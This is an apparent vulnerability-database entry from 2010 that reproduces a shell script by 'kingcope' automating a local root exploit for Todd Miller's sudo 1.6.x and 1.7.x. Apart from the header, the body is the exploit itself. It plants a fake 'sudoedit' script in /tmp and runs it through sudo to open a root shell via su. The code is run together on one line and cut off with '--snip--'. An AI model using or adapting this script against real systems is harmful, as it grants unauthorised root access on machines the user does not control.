Todd Miller Sudo local root exploit discovered by Slouching

Type securityvulns
Reporter Securityvulns
Modified 2010-03-02T00:00:00


Just for the record.



Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4

local root exploit

March 2010

automated by kingcope

Full Credits to Slouching

echo Tod Miller Sudo local root exploit echo by Slouching echo automated by kingcope if [ $# != 1 ] then echo "usage: ./ <file you have permission to edit>" exit fi cd /tmp cat > sudoedit << _EOF


echo ALEX-ALEX su /bin/su /usr/bin/su _EOF chmod a+x ./sudoedit sudo ./sudoedit $1 --snip---

cheers, kingcope